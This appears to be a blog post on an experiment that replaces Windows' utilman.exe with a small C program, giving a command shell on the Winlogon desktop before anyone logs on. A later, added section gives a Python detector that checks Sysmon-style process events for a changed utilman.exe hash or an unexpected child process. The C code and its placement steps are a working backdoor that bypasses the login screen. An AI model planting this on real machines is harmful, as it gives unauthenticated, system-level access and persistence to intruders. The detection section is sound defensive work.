Comments posted by evilbitz on my Playing with utilman.exe post gave me a great idea for another experiment with utilman.exe:
You can compile the following example with Borland’s free C++ 5.5 compiler.
Fourth experiment
Compile this simple C program, name it utilman.exe and put it in the system32 directory:
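    #include <stdio.h>
    #include <stdlib.h>
    #include <windows.h>
    #include <tchar.h>

    int _tmain(void)
    {
        STARTUPINFO s;
        PROCESS_INFORMATION p;
        /* CreateProcess may modify the command line, so pass writable copies */
        LPTSTR szCmdline = _tcsdup(TEXT("CMD"));
        LPTSTR szDesktop = _tcsdup(TEXT("WinSta0\\Winlogon"));

        ZeroMemory(&s, sizeof(s));
        s.cb = sizeof(s);
        s.lpDesktop = szDesktop;   /* start the child on the Winlogon desktop */
        ZeroMemory(&p, sizeof(p));

        /* Close the handles only if the process was actually created */
        if (CreateProcess(NULL, szCmdline, NULL, NULL, FALSE, CREATE_NEW_CONSOLE, NULL, NULL, &s, &p))
        {
            CloseHandle(p.hProcess);
            CloseHandle(p.hThread);
        }
        free(szCmdline);
        free(szDesktop);
        return 0;
    }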
Whenever you press the magic key sequence (Windows Logo key & U key), a command shell will open on the Winlogon desktop. And you don’t have to be logged on to do this.
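Seen from the monitoring side, this experiment leaves two traces in process-creation telemetry: a utilman.exe image whose hash no longer matches the vendor binary, and a command shell whose parent is utilman.exe. The following is an added example, not part of the original post; the events are constructed in the shape of Sysmon Event ID 1 records, and the baseline hash and the list of expected child processes are assumptions to adapt to your Windows build.

```python
import ntpath

# Assumption: accessibility tools Utilman legitimately starts on this build.
EXPECTED_CHILDREN = {"osk.exe", "magnify.exe", "narrator.exe"}
# Placeholder baseline: SHA-256 of the vendor utilman.exe (constructed value).
KNOWN_GOOD_UTILMAN = "A" * 64

SYS32 = "C:\\Windows\\System32\\"
# Constructed sample events using Sysmon process-creation field names.
SAMPLE_EVENTS = [
    {"Image": SYS32 + "utilman.exe", "ParentImage": SYS32 + "winlogon.exe",
     "Hashes": "MD5=" + "0" * 32 + ",SHA256=" + "A" * 64},
    {"Image": SYS32 + "osk.exe", "ParentImage": SYS32 + "utilman.exe",
     "Hashes": "SHA256=" + "C" * 64},
    {"Image": SYS32 + "utilman.exe", "ParentImage": SYS32 + "winlogon.exe",
     "Hashes": "SHA256=" + "B" * 64},
    {"Image": SYS32 + "cmd.exe", "ParentImage": SYS32 + "utilman.exe",
     "Hashes": "SHA256=" + "D" * 64},
    {"Image": SYS32 + "cmd.exe", "ParentImage": "C:\\Windows\\explorer.exe",
     "Hashes": "SHA256=" + "D" * 64},
]

def basename(path):
    """File name of a Windows path, lower-cased (works on any host OS)."""
    return ntpath.basename(path).lower()

def sha256_of(event):
    """Extract the SHA256 value from a 'ALGO=hex,ALGO=hex' Hashes field."""
    for part in event.get("Hashes", "").split(","):
        algo, _, value = part.partition("=")
        if algo.strip().upper() == "SHA256":
            return value.strip().upper()
    return None

def findings(events, known_good=KNOWN_GOOD_UTILMAN):
    """Return (event index, reason) for each sign of a replaced utilman.exe."""
    out = []
    for i, ev in enumerate(events):
        image = basename(ev.get("Image", ""))
        parent = basename(ev.get("ParentImage", ""))
        # Trace 1: the binary running as utilman.exe is not the vendor file.
        if image == "utilman.exe" and sha256_of(ev) != known_good.upper():
            out.append((i, "utilman.exe hash differs from baseline"))
        # Trace 2: utilman.exe started something other than an accessibility tool.
        if parent == "utilman.exe" and image not in EXPECTED_CHILDREN:
            out.append((i, "unexpected child of utilman.exe: " + image))
    return out
```

The hash check catches the replacement even when the replaced binary starts no child process; the parent-child check catches the shell even when no baseline hash is available.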